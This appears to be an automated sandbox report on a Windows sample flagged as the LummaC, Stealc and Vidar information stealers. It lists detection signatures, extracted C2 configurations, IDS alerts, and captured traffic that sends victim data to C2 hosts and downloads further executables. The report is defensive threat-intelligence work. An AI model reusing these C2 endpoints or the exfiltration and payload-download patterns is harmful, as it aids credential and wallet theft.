Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1558835
MD5:	e26ad37f58eaf809521e5050bebf9be4
SHA1:	b3468cf198d25f6453d40c65274082eec17a3572
SHA256:	e6ad1d53d8a2ecdbf77d597454b0260965b357693c0e525c0ffc81b283f4c7a6
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

LummaC encrypted strings found

Machine Learning detection for sample

PE file contains section with special chars

Query firmware table information (likely to detect VMs)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Downloads executable code via HTTP

Entry point lies outside standard sections

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 7616 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E26AD37F58EAF809521E5050BEBF9BE4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}

Threatname: LummaC

{"C2 url": ["p3ar11fter.sbs", "peepburry828.sbs", "p10tgrace.sbs", "3xp3cts1aim.sbs", "processhol.sbs"], "Build id": "LOGS11--LiveTraffic"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.1632829541.0000000000795000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000002.00000002.1635741412.0000000005BD1000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000002.00000003.1592515790.00000000080B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000002.00000003.1422362326.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.1449515959.00000000007FA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 7616	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 7616	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 7616	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: file.exe PID: 7616	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 7616	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: file.exe PID: 7616	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 6 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-19T21:02:17.590625+0100	2028371	3	Unknown Traffic	192.168.2.7	49708	188.114.97.3	443	TCP
2024-11-19T21:02:20.489097+0100	2028371	3	Unknown Traffic	192.168.2.7	49725	188.114.97.3	443	TCP
2024-11-19T21:02:21.706827+0100	2028371	3	Unknown Traffic	192.168.2.7	49735	188.114.97.3	443	TCP
2024-11-19T21:02:24.224595+0100	2028371	3	Unknown Traffic	192.168.2.7	49750	188.114.97.3	443	TCP
2024-11-19T21:02:25.602868+0100	2028371	3	Unknown Traffic	192.168.2.7	49761	188.114.97.3	443	TCP
2024-11-19T21:02:28.212544+0100	2028371	3	Unknown Traffic	192.168.2.7	49778	188.114.97.3	443	TCP
2024-11-19T21:02:31.747289+0100	2028371	3	Unknown Traffic	192.168.2.7	49802	188.114.97.3	443	TCP
2024-11-19T21:02:36.459981+0100	2028371	3	Unknown Traffic	192.168.2.7	49832	188.114.97.3	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-19T21:02:18.955093+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49708	188.114.97.3	443	TCP
2024-11-19T21:02:20.913004+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49725	188.114.97.3	443	TCP
2024-11-19T21:02:36.863927+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49832	188.114.97.3	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-19T21:02:18.955093+0100	2049836	1	A Network Trojan was detected	192.168.2.7	49708	188.114.97.3	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-19T21:02:20.913004+0100	2049812	1	A Network Trojan was detected	192.168.2.7	49725	188.114.97.3	443	TCP

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-19T21:02:37.038978+0100	2019714	2	Potentially Bad Traffic	192.168.2.7	49839	185.215.113.16	80	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-19T21:02:23.190951+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.7	49735	188.114.97.3	443	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-19T21:02:43.772903+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.7	49876	185.215.113.206	80	TCP

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 19 Nov 2024 20:02:37 GMTContent-Type: application/octet-streamContent-Length: 1814528Last-Modified: Tue, 19 Nov 2024 19:58:34 GMTConnection: keep-aliveETag: "673cedea-1bb000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 22 01 00 00 00 00 00 00 70 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 a0 69 00 00 04 00 00 c2 de 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 a0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 80 2a 00 00 c0 24 00 00 02 00 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 6d 73 6f 79 69 77 68 00 20 1a 00 00 40 4f 00 00 12 1a 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 77 79 6d 6c 74 69 79 00 10 00 00 00 60 69 00 00 04 00 00 00 8a 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 69 00 00 22 00 00 00 8e 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGHJJEHDHCAAKFIIDGIHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 39 39 33 45 46 35 32 30 39 33 35 35 37 34 32 31 37 39 36 35 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 2d 2d 0d 0a Data Ascii: ------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="hwid"E993EF520935574217965------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="build"mars------ECGHJJEHDHCAAKFIIDGI--

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 185.215.113.206 185.215.113.206
Source: Joe Sandbox View	IP Address: 185.215.113.206 185.215.113.206

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49750 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49708 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49735 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49725 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49761 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49778 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49802 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49832 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.7:49839 -> 185.215.113.16:80

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cook-rain.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: cook-rain.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CTPDKFGRVFAZ4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12820Host: cook-rain.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7F86KJFW4RGNPFATUKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15082Host: cook-rain.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XHOZEPLKFR1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20365Host: cook-rain.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=H5ZRJNGOBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1188Host: cook-rain.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=74RWR44EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 583405Host: cook-rain.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 88Host: cook-rain.sbs
Source: global traffic	HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: global traffic	HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: cook-rain.sbs

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cook-rain.sbs

Source: file.exe, 00000002.00000003.1569706823.0000000000802000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/7J
Source: file.exe, 00000002.00000003.1569706823.0000000000802000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/8L$3
Source: file.exe, 00000002.00000003.1569706823.0000000000802000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/S/-3
Source: file.exe, 00000002.00000002.1632829541.0000000000795000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1569673630.00000000007D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe
Source: file.exe, 00000002.00000003.1569673630.00000000007D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exeO
Source: file.exe, 00000002.00000003.1569706823.0000000000802000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/qd#3
Source: file.exe, 00000002.00000002.1632829541.0000000000795000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1569673630.00000000007D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: file.exe, 00000002.00000002.1632719419.000000000057A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exebKit/537.36
Source: file.exe, 00000002.00000003.1569706823.0000000000802000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/tp
Source: file.exe, 00000002.00000003.1569706823.0000000000802000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/x4e3
Source: file.exe, 00000002.00000003.1569706823.0000000000802000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/zwn35
Source: file.exe, 00000002.00000002.1632829541.0000000000795000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000002.00000002.1632829541.0000000000795000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1632829541.0000000000800000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000002.00000002.1632829541.0000000000754000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/405117-2476756634-1003bO
Source: file.exe, 00000002.00000002.1632829541.0000000000795000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/C
Source: file.exe, 00000002.00000002.1632829541.0000000000761000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1632829541.0000000000795000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1632829541.0000000000800000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000002.00000002.1632829541.0000000000795000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: file.exe, 00000002.00000002.1632829541.0000000000795000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php:
Source: file.exe, 00000002.00000002.1632829541.0000000000800000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php?#
Source: file.exe, 00000002.00000002.1632829541.0000000000795000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/i
Source: file.exe, 00000002.00000002.1632829541.0000000000795000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/ntdesk
Source: file.exe, 00000002.00000002.1632829541.0000000000795000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.2069
Source: file.exe, 00000002.00000003.1422752155.00000000054B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000002.00000003.1422752155.00000000054B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
